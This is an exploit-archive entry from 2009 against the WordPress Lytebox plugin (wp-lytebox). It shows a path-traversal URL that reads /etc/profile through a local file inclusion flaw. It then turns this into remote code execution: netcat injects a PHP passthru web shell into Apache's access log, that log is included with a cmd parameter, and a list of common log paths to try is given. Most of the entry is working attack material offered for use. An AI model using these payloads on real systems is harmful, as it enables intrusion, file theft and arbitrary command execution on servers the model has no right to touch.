Wordpress Plugin Lytebox (wp-lytebox) Local File Inclusion Vulnerability

2009-05-26T00:00:00
ID 1337DAY-ID-5246
Type zdt
Reporter TurkGuvenligi
Modified 2009-05-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================================
Wordpress Plugin Lytebox (wp-lytebox) Local File Inclusion Vulnerability
========================================================================


WP Plugin Lytebox Local File Include and Remote Code Exe.

Download ; http://grupenet.com/wp-content/uploads/wp-lytebox.zip

Author : TurkGuvenligi

Agd_Scorp - t4cs1zkr4L - TheHacker - Fatih - BLaSTeR

LFI;

http://localhost/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../../etc/profile%00

RCE;

open cmd (cmd ac?yoruz)

nc -vv 127.0.0.1 80 (connecting)
GET /<?php passthru(\$_GET[cmd]); ?> HTTP/1.0
Host : www.target.com

Our error is recorded and access_log :) yeah

http://localhost/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../../var/log/apache2/access_log&cmd=[RCE]

access_log file ;


../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../etc/httpd/logs/access_log
../../../../../../../../../../etc/httpd/logs/access.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/apache2/error_log
../../../../../../../../../../var/log/apache2/error.log
../../../../../../../../../../var/log/apache2/access_log
../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/error_log
../../../../../../../../../../var/log/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/access.log




#  0day.today [2018-01-01]  #